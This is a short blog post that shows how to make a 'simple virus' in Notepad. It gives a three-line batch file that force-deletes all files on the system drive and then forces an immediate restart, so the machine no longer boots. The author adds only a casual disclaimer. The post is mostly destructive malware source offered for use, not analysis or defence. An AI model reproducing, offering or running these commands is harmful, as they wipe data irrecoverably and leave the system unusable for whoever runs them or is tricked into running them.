browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

How to make a simple virus using notepad

Posted by on February 16, 2011

go to notepad and type the following and save it as a .bat file

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

If executed this program will immediately shutdown ur system and delete all the contents of the system drive. Next time your system wont boot. Please dont try it in your own system. I am not responsible for anything done by using this program

Leave a Reply

Your email address will not be published. Required fields are marked *